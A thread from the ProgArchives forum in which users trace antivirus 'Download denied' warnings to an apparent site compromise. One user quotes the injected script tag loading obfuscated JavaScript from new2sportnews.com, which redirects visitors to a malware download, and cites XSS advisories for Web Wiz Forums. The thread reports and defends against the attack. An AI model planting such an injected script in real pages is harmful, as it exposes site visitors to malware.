Forum Home Forum Home > Site News, Newbies, Help and Improvements > Report bugs here
  New Posts New Posts RSS Feed - Download denied
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Download denied

 Post Reply Post Reply Page  12>
Author
Message Reverse Sort Order
Nogbad_The_Bad View Drop Down
Forum & Site Admin Group
Forum & Site Admin Group
Avatar
RIO/Avant/Zeuhl & Eclectic Team

Joined: March 16 2007
Location: Boston
Status: Offline
Points: 20850
Post Options Post Options   Thanks (0) Thanks(0)   Quote Nogbad_The_Bad Quote  Post ReplyReply Direct Link To This Post Topic: Download denied
    Posted: October 06 2022 at 12:29
That's what I'm watching.
Ian

Host of the Post-Avant Jazzcore Happy Hour on Progrock.com

https://podcasts.progrock.com/post-avant-jazzcore-happy-hour/
Back to Top
chopper View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator

Joined: July 13 2005
Location: Essex, UK
Status: Offline
Points: 20030
Post Options Post Options   Thanks (0) Thanks(0)   Quote chopper Quote  Post ReplyReply Direct Link To This Post Posted: October 06 2022 at 12:13
PA is well behind in its version of the forum software but I don't suppose it's going to get upgraded any time soon since M@x seems to have abandoned it. I'm thinking PA is dying a slow death now, at some point the forum software will stop working (it's probably out of support now).
Back to Top
wiz_d_kidd View Drop Down
Forum Senior Member
Forum Senior Member
Avatar

Joined: January 13 2018
Location: EllicottCityMD
Status: Offline
Points: 1423
Post Options Post Options   Thanks (0) Thanks(0)   Quote wiz_d_kidd Quote  Post ReplyReply Direct Link To This Post Posted: October 06 2022 at 10:08
Apparently PA uses Web Wiz Forums software, version 11.01 (released 10 Sep 2014). The latest version is 12.05 (released 18 Jan 2022). I did a search for Web Wiz vulnerabilities, and found that many versions, beginning with v6.34 and extending thru v10.03, were identified as having vulnerability to cross-site scripting (XSS) attacks. That's a lot of versions for which they never fixed the problem, and it still might be present in v11.01.

https://www.cvedetails.com/cve/CVE-2006-0175/
https://www.exploit-db.com/exploits/28589
https://vulmon.com/searchpage?q=web+wiz+forum
https://www.nmmapper.com/st/exploitdetails/37678/36689/web-wiz-forums-multiple-cross-site-scripting-vulnerabilitiesdownload/



Edited by wiz_d_kidd - October 06 2022 at 10:10
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart
Back to Top
wiz_d_kidd View Drop Down
Forum Senior Member
Forum Senior Member
Avatar

Joined: January 13 2018
Location: EllicottCityMD
Status: Offline
Points: 1423
Post Options Post Options   Thanks (0) Thanks(0)   Quote wiz_d_kidd Quote  Post ReplyReply Direct Link To This Post Posted: October 06 2022 at 06:42
I'm not sure how this website works, but the root infection might actually be in the code that generates and updates the pages your browser receives. Removing the bad script from the output pages might not fix the problem, if it gets added again then next time the page refreshes.

So far, this is the status of the pages I'm aware of:

Main - not infected
Forums - infected
Prog Rock Guides - infected
Log In - not infected
Prog Radios - not infected
Prog Links - not infected
FAQ - infected
About Us - not infected

The bad script occurs multiple times on some of these pages, not just once.
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart
Back to Top
chopper View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator

Joined: July 13 2005
Location: Essex, UK
Status: Offline
Points: 20030
Post Options Post Options   Thanks (0) Thanks(0)   Quote chopper Quote  Post ReplyReply Direct Link To This Post Posted: October 05 2022 at 11:21
Presumably this is a fairly simple code change to remove references to that script from the code? Can you tell which pages are impacted?
Back to Top
wiz_d_kidd View Drop Down
Forum Senior Member
Forum Senior Member
Avatar

Joined: January 13 2018
Location: EllicottCityMD
Status: Offline
Points: 1423
Post Options Post Options   Thanks (0) Thanks(0)   Quote wiz_d_kidd Quote  Post ReplyReply Direct Link To This Post Posted: October 05 2022 at 10:12
The website https://new2sportnews.com, and the script (progarchives.js) are still there, but that script invokes another script (of unknown name) at https://advertising-cdn.com which is now offline. I agree with you that they can relaunch a future attack with ease now that they have the "hooks" built into PA.

This all smacks of a Reflected Cross-Site Scripting (XSS) attack, which is explained here: https://portswigger.net/web-security/cross-site-scripting




Edited by wiz_d_kidd - October 05 2022 at 10:18
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart
Back to Top
chopper View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator

Joined: July 13 2005
Location: Essex, UK
Status: Offline
Points: 20030
Post Options Post Options   Thanks (0) Thanks(0)   Quote chopper Quote  Post ReplyReply Direct Link To This Post Posted: October 05 2022 at 07:14
Edge developer tools are throwing up an error on that web page. I'm not an expert on this, but that suggests to me that the script is not being executed however that would be the case if the web site is not longer there, but it does leave PA open to future attacks, I would guess.


Back to Top
chopper View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator

Joined: July 13 2005
Location: Essex, UK
Status: Offline
Points: 20030
Post Options Post Options   Thanks (0) Thanks(0)   Quote chopper Quote  Post ReplyReply Direct Link To This Post Posted: October 05 2022 at 06:50
Wow, that is worrying, thanks for doing this.

Do you know the name of the file that it attempts to download? My anti-virus is not picking anything up but, as you say, this could be a serious problem. It's a shame M@x no longer does anything with PA.
Back to Top
wiz_d_kidd View Drop Down
Forum Senior Member
Forum Senior Member
Avatar

Joined: January 13 2018
Location: EllicottCityMD
Status: Offline
Points: 1423
Post Options Post Options   Thanks (0) Thanks(0)   Quote wiz_d_kidd Quote  Post ReplyReply Direct Link To This Post Posted: October 04 2022 at 10:49
It seems that many users, myself included, have had similar issues. I've spent considerable time digging into the source of the problem. The upshot is that ProgArchives appears to have been hacked!

Back in August, I began getting warnings from Norton Antivirus about a malicious activity (i.e. intrusion detections) when I visit the "Forums", or "Prog Rock Guides" pages. But it doesn't happen on the "About Us" page, or the main page.

The problem is that the HTML code for the Forums and Guides pages (and probably others) contains malicious javascript that looks like this:

    <script src="https://new2sportnews.com/progarchives.js" type="d597b4f971c3864a4c6a613f-text/javascript"></script>

The referenced site, new2sportnews.com, has the appearance of the Nigerian version of The Guardian website. However, it is a bogus web site. It was created in Jan 2021 and had no content until Jun 2022, and the content (according to the internet's Wayback Machine) has not changed since then.

The javascript that is stored at that site (i.e. https://new2sportnews.com/progarchives.js) and is being executed unconditionally by Progarchives, is highly obfuscated to hide its function. I ran it through an "unobfuscator" and confirmed that the script redirects the user to a site called "advertising-cdn.com" which attempts to download a file to the user's computer. The nature of the file is unknown. It could be password stealing, keystroke interception, or other nefarious functions.

I also checked Progarchives using the Wayback Machine and determined that it was clean as of July 19th. Sometime after that is when the system was hacked. Users, myself included, began experiencing problems around Aug 7th.

After an update to my Norton Antivirus, it started completely blocking my access to the forums because I couldn't stop it from executing the malicious javascript. I could disable javascript entirely, but then I could not post or vote in polls. My solution was to install the NoScript add-on to Firefox, and disable scripts specifically for new2sportnews.com. That seems to have worked, as least for now.

The target site, advertising-cdn.com, which contains the dowloader script appeared to be a valid site at first, but now it is gone. The hackers could be working on a different attack.

I've contacted PA admins through every means possible. Thanks to Ian (aka Nogbad the Bad) for forwarding private messages that I sent him on Progressive ears. I also contacted the site owners/admins thru GoDaddy, but so far no one has responded.

I hope that our site admins fix this infection before its users are seriously attacked. There is no valid reason that the HTML code for this site should be executing a javascript on a bogus website!

To check for yourself, look at the page source HTML (in Firefox right-click anywhere on a page and select "View Page Source"), then search for new2sportnews.com. If you find it, you've confirmed that the site has been hacked and can potentially cause serious harm to its users (if it hasn't already).

“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart
Back to Top
I prophesy disaster View Drop Down
Forum Senior Member
Forum Senior Member
Avatar

Joined: December 31 2017
Location: Australia
Status: Online
Points: 4780
Post Options Post Options   Thanks (0) Thanks(0)   Quote I prophesy disaster Quote  Post ReplyReply Direct Link To This Post Posted: September 24 2022 at 04:01
I should remark that it was only yesterday's "Download denied" notifications that were caused by the VPN. The original problem that lasted more than a month was not caused by the VPN. I don't use the VPN to visit this site and it was quite by accident without realising that it was still on that it was in use while I was visiting this site yesterday.
 

No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
Back to Top
I prophesy disaster View Drop Down
Forum Senior Member
Forum Senior Member
Avatar

Joined: December 31 2017
Location: Australia
Status: Online
Points: 4780
Post Options Post Options   Thanks (0) Thanks(0)   Quote I prophesy disaster Quote  Post ReplyReply Direct Link To This Post Posted: September 23 2022 at 15:52
^ VPN server in London –> "Download denied" notification.
VPN server in Sydney –> "Download denied" notification.
 
So, it appears that the problem is with the VPN.
 



Edited by I prophesy disaster - September 23 2022 at 15:56
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
Back to Top
I prophesy disaster View Drop Down
Forum Senior Member
Forum Senior Member
Avatar

Joined: December 31 2017
Location: Australia
Status: Online
Points: 4780
Post Options Post Options   Thanks (0) Thanks(0)   Quote I prophesy disaster Quote  Post ReplyReply Direct Link To This Post Posted: September 23 2022 at 15:44
I just discovered something quite interesting: I have a VPN which I sometimes use and sometimes don't use, depending on what I'm doing. When I'm not using the VPN, I don't get the "Download denied" notification. But when I do use the VPN (server in Los Angeles), I get the notifications. I haven't yet tried the VPN server in other available locations, so I don't know if the problem is with the VPN or the location.
 

No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
Back to Top
I prophesy disaster View Drop Down
Forum Senior Member
Forum Senior Member
Avatar

Joined: December 31 2017
Location: Australia
Status: Online
Points: 4780
Post Options Post Options   Thanks (0) Thanks(0)   Quote I prophesy disaster Quote  Post ReplyReply Direct Link To This Post Posted: September 23 2022 at 11:32
^And the "PROG ROCK GUIDES" and "FAQ" links.
 

No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
Back to Top
I prophesy disaster View Drop Down
Forum Senior Member
Forum Senior Member
Avatar

Joined: December 31 2017
Location: Australia
Status: Online
Points: 4780
Post Options Post Options   Thanks (0) Thanks(0)   Quote I prophesy disaster Quote  Post ReplyReply Direct Link To This Post Posted: September 23 2022 at 11:25
Originally posted by I prophesy disaster I prophesy disaster wrote:

not on the database pages

Actually, it does occur when I click on any of the "PROG SUB-GENRES" links.
 

No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
Back to Top
Cristi View Drop Down
Special Collaborator
Special Collaborator
Avatar
Crossover / Prog Metal Teams

Joined: July 27 2006
Location: wonderland
Status: Online
Points: 43717
Post Options Post Options   Thanks (0) Thanks(0)   Quote Cristi Quote  Post ReplyReply Direct Link To This Post Posted: September 23 2022 at 11:12
Originally posted by I prophesy disaster I prophesy disaster wrote:

^ This problem is only occurring on the forum pages, not on the database pages. But it does occur every time I click on any link in the forum.
 
How did you solve your problem (if it isn't too involved to say)?
 

I played with the antivirus settings, trial and error. I got it right in the end. 
I don't use Google chrome for PA anymore.
Back to Top
I prophesy disaster View Drop Down
Forum Senior Member
Forum Senior Member
Avatar

Joined: December 31 2017
Location: Australia
Status: Online
Points: 4780
Post Options Post Options   Thanks (0) Thanks(0)   Quote I prophesy disaster Quote  Post ReplyReply Direct Link To This Post Posted: September 23 2022 at 11:08
^ This problem is only occurring on the forum pages, not on the database pages. But it does occur every time I click on any link in the forum.
 
How did you solve your problem (if it isn't too involved to say)?
 

No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
Back to Top
Cristi View Drop Down
Special Collaborator
Special Collaborator
Avatar
Crossover / Prog Metal Teams

Joined: July 27 2006
Location: wonderland
Status: Online
Points: 43717
Post Options Post Options   Thanks (0) Thanks(0)   Quote Cristi Quote  Post ReplyReply Direct Link To This Post Posted: September 23 2022 at 10:50
Originally posted by I prophesy disaster I prophesy disaster wrote:

^ This is the only site where it happens. And there was another topic started by wiz_d_kidd reporting something similar: Intrusion Detected from PA. That topic referred to the same website, but I think the difference might be due to different security software. It is the security software that is producing the notifications.
 

I had some problems a few months ago, but it was my antivirus that didn't let me see any album pages because of "phishing". I solved the problem but it took me a little while. 
Back to Top
I prophesy disaster View Drop Down
Forum Senior Member
Forum Senior Member
Avatar

Joined: December 31 2017
Location: Australia
Status: Online
Points: 4780
Post Options Post Options   Thanks (0) Thanks(0)   Quote I prophesy disaster Quote  Post ReplyReply Direct Link To This Post Posted: September 23 2022 at 10:47
^ This is the only site where it happens. And there was another topic started by wiz_d_kidd reporting something similar: Intrusion Detected from PA. That topic referred to the same website, but I think the difference might be due to different security software. It is the security software that is producing the notifications.
 

No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
Back to Top
Cristi View Drop Down
Special Collaborator
Special Collaborator
Avatar
Crossover / Prog Metal Teams

Joined: July 27 2006
Location: wonderland
Status: Online
Points: 43717
Post Options Post Options   Thanks (0) Thanks(0)   Quote Cristi Quote  Post ReplyReply Direct Link To This Post Posted: September 23 2022 at 10:33
^ it does not seem to be PA fault for what's going on there. I think your browser is stuck on some weird ads, trackers and the likes. 
Back to Top
I prophesy disaster View Drop Down
Forum Senior Member
Forum Senior Member
Avatar

Joined: December 31 2017
Location: Australia
Status: Online
Points: 4780
Post Options Post Options   Thanks (0) Thanks(0)   Quote I prophesy disaster Quote  Post ReplyReply Direct Link To This Post Posted: September 23 2022 at 10:26
Originally posted by Cristi Cristi wrote:

I've never seen such a thing happen. Confused
Download denied? what download?

That's the notification I get. I have no idea to what "download" is referring. I assume it's something that the https://advertising-cdn.com website is trying to download onto my computer.

Originally posted by Cristi Cristi wrote:

Microsoft Edge is not a good browser IMO, even google chrome has gotten worse. 
Try Mozilla Firefox (although it collapsed for me once a few years back) and a new(er) browser called Brave.

I have four browsers on my computer, but I mostly use only two of them: Edge and Chrome. I use Edge for sites that keep me logged on, such as this site, and Chrome for things I'd rather clear my browser history, cookies, etc. I have Firefox but I don't like it.
 

No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
Back to Top
 Post Reply Post Reply Page  12>

Forum Jump Forum Permissions View Drop Down



This page was generated in 0.287 seconds.
Donate monthly and keep PA fast-loading and ad-free forever.